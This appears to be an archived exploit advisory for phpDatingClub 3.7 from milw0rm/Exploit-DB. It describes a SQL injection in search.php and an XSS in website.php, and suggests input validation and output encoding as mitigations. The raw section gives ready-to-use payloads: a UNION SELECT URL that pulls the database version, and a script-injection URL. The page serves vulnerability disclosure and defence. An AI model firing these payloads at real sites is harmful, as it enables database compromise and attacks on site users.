phpDatingClub v 3.7(ansubdepartments_id) SQL/XSS Injection Vulnerability

vendor:

phpDatingClub

by:

ThE g0bL!N

7,5

CVSS

HIGH

SQL/XSS Injection

CWE

Product Name: phpDatingClub

Affected Version From: 3.7

Affected Version To: 3.7

Patch Exists: NO

Related CWE: N/A

CPE: a:phpdatingclub:phpdatingclub:3.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

phpDatingClub v 3.7(ansubdepartments_id) SQL/XSS Injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'sform[day]' in the 'search.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. An attacker can also exploit this vulnerability by sending a malicious XSS payload to the vulnerable parameter 'page' in the 'website.php' script. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should also encode all output sent to the user's browser.

Source

Exploit-DB raw data:

###################################################################
###################################################################
phpDatingClub v 3.7(ansubdepartments_id) SQL/XSS Injection Vulnerability    
Note: Algeria 2-0 Zambia
###################################################################
Founder : ThE g0bL!N
Home:WwW.Snakespc.CoM
More info:http://www.w2b.ru/webapp.php?cat=phpDatingClub
###################################################################
###################################################################
SQL Injection Vulnerability  
###################################################################
Exploit
###################################################################
Http://www.site.com/phpDatingClub/search.php?mode=day&sform%5Bday%5D=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
Xss
website.php?page=%3Cscript%3Ealert(0)%3C/script%3E
Demo
----
http://www.w2b.ru/demo/phpDatingClub/
######################################################################
Greeting : Super_Ctistal (My Master)  And all Muslims&algerian Hackers

# milw0rm.com [2009-06-22]